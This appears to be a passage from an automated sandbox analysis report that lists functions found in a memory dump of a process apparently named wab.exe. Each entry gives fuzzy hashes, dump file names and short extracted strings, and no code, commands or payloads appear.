                                          • Opcode ID: d91806b5583a3cccb4ac33fde3e26c16e90355f17e15c2074a5723f9f4e842e5
                                          • Instruction ID: 6f2960fd0ac7be419926a1291bf130105b0d38e0c44230134e78aba9edec6792
                                          • Opcode Fuzzy Hash: d91806b5583a3cccb4ac33fde3e26c16e90355f17e15c2074a5723f9f4e842e5
                                          • Instruction Fuzzy Hash: 9601DCB2210640AFE311CF24CD59F2677E8F754B19F028939BAA8CB2A0E334D804CB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 0f6b851f142b313428c8dd43dd479d1d865845f1f07b0bfc14e2f098b9a4e2da
                                          • Instruction ID: 67a3d18453c768e7da56eabd45dc6f36ae876706dcdf4c836d02d4a1a4dc8c63
                                          • Opcode Fuzzy Hash: 0f6b851f142b313428c8dd43dd479d1d865845f1f07b0bfc14e2f098b9a4e2da
                                          • Instruction Fuzzy Hash: D2827C75E002588FEB25CFA9C888B9DBBB2FF58350F1081AAD959AB361D7349D41CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9490bed4cbe763661aaa5968986eba891bbd07dea590b101a129e41a12c59bb6
                                          • Instruction ID: 05beee2d9e32af8c60cf3d80e3c4da97174ebaf4b45011661ee256635a80ac1b
                                          • Opcode Fuzzy Hash: 9490bed4cbe763661aaa5968986eba891bbd07dea590b101a129e41a12c59bb6
                                          • Instruction Fuzzy Hash: 1D414D75D012889FDB15CFA9C880AEDBBF4FB58700F10816EE9AAB7211DB309945CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 5e7b9f2da9ebd1e10f119c054c6b64f77fc7e04fb9d7ad4dbeca0c983831b48f
                                          • Instruction ID: d4dcae259bc81922eee7fbbc0524705cb067cd69e38300174e810993897a609d
                                          • Opcode Fuzzy Hash: 5e7b9f2da9ebd1e10f119c054c6b64f77fc7e04fb9d7ad4dbeca0c983831b48f
                                          • Instruction Fuzzy Hash: 60718C75E0020ACFDB28CF99C590ADDBFF2BF58B40F60816AE915A7346E7319941CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction ID: 7b0f25634f83f36097665c70309967deeb763e8431f41e3881eed928094e45f7
                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction Fuzzy Hash: FC614B72D02619AFDB11DFA5D848B9EBBB4FF94710F1046A9E920BB290D7749A04CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2474F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction ID: f7672dac3abd197317be2427e9c277a0d1c31ad3e23d3b120dd6b1cc59defd81
                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction Fuzzy Hash: 8151BCB2A15305AFE7118F54C844F6BB7F8FB94754F000929BAA1DB290D7B4ED04CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: 5e1228b8b11ced6b44b248a69d5f4c46377681a5cfe72650593a39d050709ec3
                                          • Instruction ID: 08db9295964ca49b970fd88f85e59359a2a3c9fb5f2c1beb9b279324b61f342a
                                          • Opcode Fuzzy Hash: 5e1228b8b11ced6b44b248a69d5f4c46377681a5cfe72650593a39d050709ec3
                                          • Instruction Fuzzy Hash: DA419073609751EBE711DBB1C880F5BB7E8AFA8704F4409ADFA84E7140E674D904C796
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2477B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PreferredUILanguages
                                          • API String ID: 0-1884656846
                                          • Opcode ID: c4555f93f57a68f0333811dd9e546291e1a6b2e33ec5a413cc70bb1410aee736
                                          • Instruction ID: 58ff7d6c1fb9696f8ecc66a0a39e705ba721c7b9f2c6a44b27e760a19f37b8be
                                          • Opcode Fuzzy Hash: c4555f93f57a68f0333811dd9e546291e1a6b2e33ec5a413cc70bb1410aee736
                                          • Instruction Fuzzy Hash: 5141CF32E01219ABDF11CBA5C840EFEBBB9EF44758F410166EA21EB354D634DE80C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2473C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 22810a2a6c977e96934210ffca760831ba534a1f3403e6510a799e78635db881
                                          • Instruction ID: 514a1a596ece9861313fb8ebdd8d3be14ff74a8ff01212229447e71614459bd8
                                          • Opcode Fuzzy Hash: 22810a2a6c977e96934210ffca760831ba534a1f3403e6510a799e78635db881
                                          • Instruction Fuzzy Hash: 874144F2D0112CAEEB21CB50CC84FDE7B7CAB55714F0045E5AA28AB245DB709F898F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246EA470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @3{$
                                          • API String ID: 0-1823840260
                                          • Opcode ID: 12d4fa78a118a9bcdb73f8d097721af79f0d045b34f20dad11d777d8e497db5f
                                          • Instruction ID: adde65892cd45a2bd0c7078d501b96cf39e82a94da5aaa08d14b63c9d22539a5
                                          • Opcode Fuzzy Hash: 12d4fa78a118a9bcdb73f8d097721af79f0d045b34f20dad11d777d8e497db5f
                                          • Instruction Fuzzy Hash: EC414C32A42614CFDB05CF68C890FA97BF1FB29354F1441A5E524BB395DB3AAD40CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247497A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: verifier.dll
                                          • API String ID: 0-3265496382
                                          • Opcode ID: 6887a91d3ab67fc02247265cd76e7bdc256afa07fae45e18adee8fa012e6ec85
                                          • Instruction ID: 1af4af4000bbf19be4a6484bd2f00512851cc6e6951a7851d84e130415e44414
                                          • Opcode Fuzzy Hash: 6887a91d3ab67fc02247265cd76e7bdc256afa07fae45e18adee8fa012e6ec85
                                          • Instruction Fuzzy Hash: EF3160B1A00201AFDB159F3D9860B7677F9FB88324F50847AE664DF381E6718D808B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2476705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: kLsE
                                          • API String ID: 0-3058123920
                                          • Opcode ID: 48dcb78f7d345046aa98a66f46819f2e6b70d5de8da1fa3c1f83e7a606ad95f8
                                          • Instruction ID: dda1ede5e841841f5b60d189e35d8028d02709351ec96cd7ad370d1fb272df57
                                          • Opcode Fuzzy Hash: 48dcb78f7d345046aa98a66f46819f2e6b70d5de8da1fa3c1f83e7a606ad95f8
                                          • Instruction Fuzzy Hash: EE4128715017504BF7199F70C888FA53FD6EB50BA4F200629FEB1AB2C5CB784485CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                          • Instruction ID: 6937bba437d6fc547e4295f3096d1b468cf3dea9200dc09f9bb3eb12cbb0f335
                                          • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                          • Instruction Fuzzy Hash: 0841C175A00A1AEBDB15CF48C890FBEB7B5EF54702F01406AE9829B201DB30ED41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          • Opcode ID: e96adc6f9b2b7e9f490020d4035d84aeae28a34ab16d0a0fcd35f79707f72064
                                          • Instruction ID: cea31b5ff6bde40e8404082854cd7841f697bf8f604ca9e7a3a9aed4f9a369c8
                                          • Opcode Fuzzy Hash: e96adc6f9b2b7e9f490020d4035d84aeae28a34ab16d0a0fcd35f79707f72064
                                          • Instruction Fuzzy Hash: 2A41ABB1605701DFD304CF18C880A16FFE4EB59710F1581AEE59A8F242E775D986CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246B9730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L4_wL4_w
                                          • API String ID: 0-4042522810
                                          • Opcode ID: b74afcd27cec9caa9562d94ad97bcaed80ff40c44a987850f1eebe9f8b4754c3
                                          • Instruction ID: e40a7bec87ae9bdf8e7c9a589381d1eb591ea44d95b0389d307c201fd9d492e6
                                          • Opcode Fuzzy Hash: b74afcd27cec9caa9562d94ad97bcaed80ff40c44a987850f1eebe9f8b4754c3
                                          • Instruction Fuzzy Hash: 9221D472A01614AFD3228F59C840F5A7BF5FF84B50F120479AAA9AB341DB70DC05CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FD530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: g{$
                                          • API String ID: 0-2517604415
                                          • Opcode ID: e1d52cd357b493cd15f59cefc1305e305408459dfd54ba39d60627621db481c7
                                          • Instruction ID: c4f9877e28eedba3abefaf1bc3e1c8a78a41484dc056768449d64c4d52e38dbe
                                          • Opcode Fuzzy Hash: e1d52cd357b493cd15f59cefc1305e305408459dfd54ba39d60627621db481c7
                                          • Instruction Fuzzy Hash: 5C2138B26043009BD711DB64CD44F477BE8EB68B58F020829FAA5DB354EB34ED00C7AA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: b0ce6e419b1f9699837acffd55d534456958e1073e90046c63987b2a0ed166b8
                                          • Instruction ID: f0d5dba32993a4a4f916b3b679901e7b2793eb284670e6b17d40c7ec7b70aeb9
                                          • Opcode Fuzzy Hash: b0ce6e419b1f9699837acffd55d534456958e1073e90046c63987b2a0ed166b8
                                          • Instruction Fuzzy Hash: 9F11BF303096628BEB158E19CC5CA16B7D9EBA2368F30817AE6A0CB791D6B1DC418780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2476A118 Relevance: .6, Instructions: 591COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2ba084eab1b770d9d4505deb5f4c432da2e416037ed80b43f833777d7bc0c6a
                                          • Instruction ID: 06d60b9ad29cbe0f544dad060cd94e7f3a5c48d9a0e35d8cacd0e9193cb5a28a
                                          • Opcode Fuzzy Hash: e2ba084eab1b770d9d4505deb5f4c432da2e416037ed80b43f833777d7bc0c6a
                                          • Instruction Fuzzy Hash: 5222AD702046518BDB15CF2AC490772BBF2AF46340F44849AEDA78F786E735E9D2DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247816CC Relevance: .6, Instructions: 571COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 317aec3dd655db5d5a56a4bf7326e8fe6509d6bb34cdf9c504dcc989a125b9b3
                                          • Instruction ID: 5b55ee1436213450cc2d0a66e35a0ad9600d01820e6bc1d0cbcf5693464ccea8
                                          • Opcode Fuzzy Hash: 317aec3dd655db5d5a56a4bf7326e8fe6509d6bb34cdf9c504dcc989a125b9b3
                                          • Instruction Fuzzy Hash: 9D227135B002168FDB0ACF59C490AAAB7F2FF89314F24856DD965DB345EB30E942DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C65D0 Relevance: .4, Instructions: 383COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3805603f3f07557b3fed2ea6bfadb38abd2608ef422d1225a098c65205b8b694
                                          • Instruction ID: ee4c546feb1d5ab21e2e516e41f47eb0244367fe2203181cca7cb02258131a5c
                                          • Opcode Fuzzy Hash: 3805603f3f07557b3fed2ea6bfadb38abd2608ef422d1225a098c65205b8b694
                                          • Instruction Fuzzy Hash: A1E19C71608342CFC705CF28C094A5ABBE0FF99718F058A6DF9999B352DB31E905CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246CD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: faf2e047ceb0c350efb87a29b200b86a5d1055925ab041247baf1f95b7b2aaa8
                                          • Instruction ID: 6547318aac897c1bf34a4d6ad6abd45e8200a77856c6ba080bb503b2105c4fab
                                          • Opcode Fuzzy Hash: faf2e047ceb0c350efb87a29b200b86a5d1055925ab041247baf1f95b7b2aaa8
                                          • Instruction Fuzzy Hash: CAC1C271E016269FEB14CF58C844BAEBBB6FF94710F148269DA64BB385D770E941CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246DF460 Relevance: .3, Instructions: 321COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5296af2399001022e297ab6722ce9702f2319e8d4c5c1a8ba3914f571cfeccbd
                                          • Instruction ID: 185f43a1aa0a4fbbfbb80fe00f737348108ab7e5baa5899e205fc105a21c2612
                                          • Opcode Fuzzy Hash: 5296af2399001022e297ab6722ce9702f2319e8d4c5c1a8ba3914f571cfeccbd
                                          • Instruction Fuzzy Hash: E3C13673B00251CFCB19CF18C890BB97BE1FB68B04F154199EE56AB796D7348A41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246D0535 Relevance: .3, Instructions: 300COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: 94837275b5a5fb900515ec33fea78f45f983da9f50b6a5bad4418c25d45020d2
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: 29B1D572700A45EFEB15CB64C950BAEBBF6AF88304F1445A9D662DB385D730EE41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246E90DB Relevance: .3, Instructions: 287COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
